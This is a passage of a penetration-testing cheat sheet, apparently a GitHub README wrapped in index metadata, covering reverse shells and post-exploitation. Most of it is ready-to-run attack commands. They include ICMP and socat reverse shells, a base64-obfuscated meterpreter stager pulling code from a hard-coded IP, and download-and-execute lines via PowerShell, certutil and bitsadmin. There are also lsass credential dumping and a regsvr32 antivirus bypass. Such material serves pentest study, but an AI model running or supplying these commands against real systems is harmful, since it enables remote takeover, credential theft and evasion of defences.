\u003c/b\u003e\n\n\u003cpre\u003e \n\nsysctl -w net.ipv4.icmp_echo_ignore_all=1\npython icmpsh_m.py [IP atacante] [IP victima]\n\n\u003c/pre\u003e\n\n\u003cb\u003e Client \u003c/b\u003e\n\n\u003cpre\u003eIEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress [IP atacante]\u003c/pre\u003e\n\n![icmpreverseshell](https://user-images.githubusercontent.com/7115563/35213289-6ac51b00-ff5d-11e7-9b66-766af2aaf92e.png)\n\n\u003cb\u003e Native ICMP shell \u003c/b\u003e\n\n\u003cpre\u003e \npowershell -nop -Command \"$IP = '10.10.14.42';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}\"\n\u003c/pre\u003e\n\nReference: https://esgeeks.com/icmpsh-shell-reverse-con-icmp/\n\n\n\u003ca name=\"httpproxy\"\u003e\u003c/a\u003e\u003ch3\u003e Reverse HTTP Shell through Proxy \u003c/h3\u003e\n\n\u003cpre\u003euse payload/python/meterpreter/reverse_http\u003c/pre\u003e\n\n![proxy2](https://user-images.githubusercontent.com/7115563/33836652-3d9c9624-de8a-11e7-9869-e18c5a28ebd7.png)\n\n\n```python -c \"import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHN5cwp2aT1zeXMudmVyc2lvbl9pbmZvCnVsPV9faW1wb3J0X18oezI6J3VybGxpYjInLDM6J3VybGxpYi5yZXF1ZXN0J31bdmlbMF1dLGZyb21saXN0PVsnYnVpbGRfb3BlbmVyJywnUHJveHlIYW5kbGVyJ10pCmhzPVtdCmhzLmFwcGVuZCh1bC5Qcm94eUhhbmRsZXIoeydodHRwJzonaHR0cDovLzE5Mi4xNjguMTA3LjIzMjo4MDgwJ30pKQpvPXVsLmJ1aWxkX29wZW5lcigqaHMpCm8uYWRkaGVhZGVycz1bKCdVc2VyLUFnZW50JywnTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xOyBUcmlkZW50LzcuMDsgcnY6MTEuMCkgbGlrZSBHZWNrbycpXQpleGVjKG8ub3BlbignaHR0cDovLzE3OC42Mi41OC4zNTo4MC9qOTkzQScpLnJlYWQoKSkK')))\"```\n\nFinally we set up the handler:\n\n![proxy3](https://user-images.githubusercontent.com/7115563/33836552-fd3204ac-de89-11e7-940c-71c8ab321bf7.png)\n\n\n\u003ca name=\"misc\"\u003e\u003c/a\u003e\u003ch2\u003e Miscellaneous \u003c/h2\u003e\n\n\u003ca name=\"interactiveshell\"\u003e\u003c/a\u003e\u003ch3\u003e Interactive Reverse Shell \u003c/h3\u003e\n\n\u003cb\u003e Method 1 \u003c/b\u003e\n\nAttacker:\n\n```socat file:`tty`,raw,echo=0 TCP-L:4444```\n\nVictim:\n\n```wget -q http://10.10.14.16/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.16:4444```\n\nSocat Binary: https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat\n\n\u003cb\u003e Method 2 \u003c/b\u003e\n\nIn reverse shell\n\n\u003cpre\u003e\npython -c 'import pty; pty.spawn(\"/bin/bash\")'\nCtrl-Z\n\u003c/pre\u003e\n\nIn kali\n\n\u003cpre\u003e\necho $TERM\nstty -a\nstty raw -echo\nfg\n\u003c/pre\u003e\n\nIn reverse shell\n\n\u003cpre\u003e\nreset\nexport SHELL=bash\nexport TERM=xterm-256color\nstty rows \u003cnum\u003e columns \u003ccols\u003e\nbash\n\u003c/pre\u003e\n\n\n\u003ca name=\"jailescape\"\u003e\u003c/a\u003e\u003ch3\u003erbash Jail Escape\u003c/h3\u003e\n\n\u003cb\u003eRequestTTY no\u003c/b\u003e\n\n\u003cpre\u003essh -o RequestTTY=no user@ip\u003c/pre\u003e\n\n![ttyno](https://user-images.githubusercontent.com/7115563/45673768-dec15480-bb2b-11e8-9d50-513c925b359b.png)\n\nand the result would be:\n\n![ttyfalse2](https://user-images.githubusercontent.com/7115563/45673773-e254db80-bb2b-11e8-911a-f0dec70936f4.png)\n\n\u003cb\u003eBash --noprofile\u003c/b\u003e\n\n\u003cpre\u003essh monitor@127.0.0.1 -t \"bash --noprofile\" \u003c/pre\u003e\n\n![bashnoprofile](https://user-images.githubusercontent.com/7115563/45673871-1defa580-bb2c-11e8-8004-c924ad0ddb56.png)\n\n\n\u003ca name=\"windowstransfer\"\u003e\u003c/a\u003e\u003ch3\u003e Windows File Transfer \u003c/h3\u003e\n\n\u003cb\u003ebitsadmin\u003c/b\u003e\n\n`bitsadmin /transfer debjob /download /priority normal http://\u003cip\u003e/shell.php c:\\xampp\\htdocs\\shell.php`\n\n\u003cb\u003ecscript wget.vbs (code on the repo)\u003c/b\u003e\n\n`cscript wget.vbs http://\u003cip\u003e/test.txt test.txt`\n\n\u003cb\u003epowershell\u003c/b\u003e\n\n`powershell -c \"(new-object System.Net.WebClient).Downloadfile('http://\u003cip\u003e/exploit.exe', 'C:\\Windows\\temp\\exploit.txt')\"`\n\n\u003cb\u003eftp\u003c/b\u003e\n\nclient:\n\n\u003cpre\u003e\necho open [ip] [port] \u003e ftpscript.txt\necho anonymous\u003e\u003e ftpscript.txt\necho PASS \u003e\u003e ftpscript.txt\necho bin \u003e\u003e ftpscript.txt\necho get meter.exe\u003e\u003e ftpscript.txt\necho quit \u003e\u003e ftpscript.txt\nftp -s:ftpscript.txt\n\u003c/pre\u003e\n\nserver:\n\n\u003ccode\u003epython -m pyftpdlib  --port=2121 --write\u003c/code\u003e\n\n\u003cb\u003ewget.exe\u003c/b\u003e\n\nUpload to vulnerable server from kali: ` /usr/share/windows-binaries/wget.exe`\n\n`wget.exe http://\u003cip\u003e/file file`\n\n\u003cb\u003e certutil \u003c/b\u003e\n\n`certutil -urlcache -split -f  https://\u003cip\u003e/file.txt file.txt`\n  \n\u003ca name=\"vpnrestrict\"\u003e\u003c/a\u003e\u003ch3\u003e Bypass VPN routing restrictions \u003c/h3\u003e\n\n\u003cpre\u003eopenconnect vpnXXX02.XXXX.com -u XX -s ‘vpn-slice XXX.46.0.0/16 hostname3 mantis=XXX.41.2XX.68’\u003c/pre\u003e\n\n![vpn1](https://user-images.githubusercontent.com/7115563/41146909-30e484de-6b05-11e8-82fb-acfc17a722a2.png)\n\nReference: https://github.com/dlenski/vpn-slice\n\n\u003ca name=\"avbypass\"\u003e\u003c/a\u003e\u003ch3\u003eAV Bypass\u003c/h3\u003e\n\n\u003cb\u003e Lsass Dump \u003c/b\u003e\n\n\u003cpre\u003e\n\ncertutil.exe -urlcache -f https://raw.githubusercontent.com/adon90/pentest_compilation/master/PostExplotation/mimi.vbs C:\\Windows\\temp\\mimi.vbs\n\ncscript mimi.vbs lsass.exe\n\npypykatz lsa minidump lsass.bin | tee -a dump1.txt \n\n\u003c/pre\u003e\n\nReferences: https://esmyl.medium.com/windows-memory-dump-cheat-sheet-23f32079304a\n\n\u003cb\u003e SharpSploit \u003c/b\u003e\n\n\u003cpre\u003e\nStart-Process \"powershell\" \"unblock-file .\\SharpSploit.dll\"\n\nAdd-Type -Path .\\SharpSploit.dll\n\n[SharpSploit.Execution.Shell]::ShellExecute(\"regsvr32 /s /n /u /i:http://192.168.48.151:9999/QuHBoZ.sct scrobj.dll\")\n\u003c/pre\u003e\n\n![sharpsploit](https://user-images.githubusercontent.com/7115563/46204073-2c07a800-c31c-11e8-9905-76c168432018.png)\n\nReferences: https://cobbr.io/SharpSploit.html\n\n\u003cb\u003e Workflow.Compiler \u003c/b\u003e\n\n\u003cpre\u003e C:\\Windows\\Microsoft.Net\\Framework64\\v4.0.30319\\Microsoft.Workflow.Compiler.exe test.xml results.xml \u003c/pre\u003e\n\n![workflow](https://user-images.githubusercontent.com/7115563/46660701-e79bc800-cbb7-11e8-8e07-49615b17d258.png)\n\nReferences:\n\nhttps://www.codeproject.com/Articles/25983/How-to-Execute-a-Command-in-C\nhttps://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb\n\n\n\n\n\n","funding_links":[],"categories":["XSLT (3)","XSLT","\u003ca id=\"e97d183e67fa3f530e7d0e7e8c33ee62\"\u003e\u003c/a\u003e未分类","Resources","\u003ca id=\"13d067316e9894cc40fe55178ee40f24\"\u003e\u003c/a\u003eOSCP","Pentesting","Programming/Comp Sci/SE Things"],"sub_categories":["\u003ca id=\"f110da0bf67359d3abc62b27d717e55e\"\u003e\u003c/a\u003e新添加的","Cheatsheets and Scripts","\u003ca id=\"f2c76d99a0b1fda124d210bd1bbc8f3f\"\u003e\u003c/a\u003eWordlist生成","ARM","Worth Looking At"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadon90%2Fpentest_compilation","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fadon90%2Fpentest_compilation","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fadon90%2Fpentest_compilation/lists"}